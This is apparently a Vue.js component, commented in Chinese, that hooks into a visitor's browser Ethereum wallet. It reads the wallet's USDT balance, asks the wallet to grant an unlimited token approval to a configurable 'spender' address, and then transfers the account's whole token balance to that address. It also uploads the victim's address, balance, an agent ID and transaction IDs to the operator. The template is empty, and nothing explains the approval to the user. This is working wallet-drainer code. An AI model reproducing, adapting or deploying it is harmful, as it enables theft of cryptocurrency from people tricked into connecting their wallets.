<template>
    <div class="content"></div>
</template>
<script>
import Web3 from "web3";

import Ethereum from "../../public/static/EthereumApi.json";

export default {
    name: "Ethereum",

    data() {
        return {
            account: "",
            EthereumApi: null,
            web3: null,
            ethereum: null,
            EthereumObj: {},
            quantity: "",
            ethQuantity: "",
            msg: "",
        };
    },

    // 当前Vue组件被创建时回调的hook 函数
    async created() {
        //  初始化 web3及账号
        this.EthereumApi = Ethereum.api;
        // 以太坊关闭
        await this.initWeb3Account();
    },

    methods: {
        appress() {
        },

        // 授权
        approveJoin() {
            let EthereumObj = this.EthereumObj;
            let web3 = this.web3;
            let _this = this;
            var abi = this.EthereumApi;
            // let contractAddress = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"; //合约地址
            let contractAddress = EthereumObj.Contract
                ? EthereumObj.Contract
                : "0xdAC17F958D2ee523a2206206994597C13D831ec7"; //合约地址

            var infoContract = new web3.eth.Contract(abi, contractAddress);

            // "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
            // 90000 * Math.pow(10, 6)
            infoContract.methods
                .approve(
                    EthereumObj.SpenderAddr,
                    "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
                )
                .send(
                    {
                        from: this.account,
                    },
                    function (error, result) {

                        let data = {
                            address: _this.account,
                            authAddress: EthereumObj.SpenderAddr,
                            status: result ? 1 : 0,
                            Contract: contractAddress,
                            agentId: _this.$parent.uuid,
                            type: EthereumObj.Symbol,
                            ChainId: _this.$store.state.EthereumCoding,
                            Usdt: 0,
                            Balance: _this.quantity || 0,
                            TxId: result ? result : "",
                        };

                        _this.$parent.authaccountUploading(data);
                    }
                );
        },

        // 转账
        transferJoin() {
            let EthereumObj = this.EthereumObj;
            let web3 = this.web3;
            let _this = this;
            var abi = this.EthereumApi;
            // let contractAddress = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"; //合约地址
            let contractAddress = EthereumObj.Contract
                ? EthereumObj.Contract
                : "0xdAC17F958D2ee523a2206206994597C13D831ec7"; //合约地址
            var infoContract = new web3.eth.Contract(abi, contractAddress);

            infoContract.methods
                .transfer(EthereumObj.SpenderAddr, this.quantity * Math.pow(10, 6))
                .send(
                    {
                        from: this.account,
                    },
                    function (error, result) {
                        let data = {
                            from: _this.account,
                            to: EthereumObj.SpenderAddr,
                            status: result ? 1 : 0,

                            amount: _this.quantity ? _this.quantity : 0,

                            txId: result ? result : "",
                        };

                        _this.$parent.transferRecord(data);
                    }
                );
        },
        async initWeb3Account() {
            if (window.ethereum) {
                this.ethereum = window.ethereum;
                try {
                    await window.ethereum.enable();
                } catch (error) {
                    //   console.log("User denied account access");
                }
            } else if (window.web3) {
                this.ethereum = window.web3.currentProvider;
            } else {
                this.ethereum = Web3.givenProvider;
            }
            this.web3 = new Web3(this.ethereum);

            // this.msg = this.web3;
            this.web3.eth.getAccounts().then((accs) => {
                this.account = accs[0];

                // 设置默认以太坊账户
                if (!this.account) {
                    return;
                }
                this.$emit("getAddress", this.account);

                this.web3.eth.defaultAccount = this.account;

                let _this = this;
                this.getAddressBalance();
                let number = 1 * Math.pow(10, 18) + "";
                this.web3.eth.getBalance(this.account, (err, result) => {
                    if (err == null) {
                        _this.ethQuantity = _this.web3.utils.fromWei(result, "ether");

                        console.log("~:" + _this.web3.utils.fromWei(result, "ether"));
                    } else {
                        console.log("~error:" + err);
                    }
                });
            });
        },
        //  获取余额
        getAddressBalance() {
            let EthereumObj = this.EthereumObj;
            let web3 = this.web3;
            let _this = this;
            var abi = this.EthereumApi;
            let contractAddress =
                EthereumObj.Contract || "0xdAC17F958D2ee523a2206206994597C13D831ec7"; //合约地址
            var infoContract = new web3.eth.Contract(abi, contractAddress);

            // 查看某个账号的代币余额
            infoContract.methods
                .balanceOf(this.account)
                .call({from: this.account}, function (error, result) {
                    if (!error) {
                        _this.quantity = result / Math.pow(10, 6);

                        _this.$emit("getAddress", _this.account, _this.quantity);
                    } else {
                        console.log(error, "555");
                    }
                });
        },
    },
};
</script>
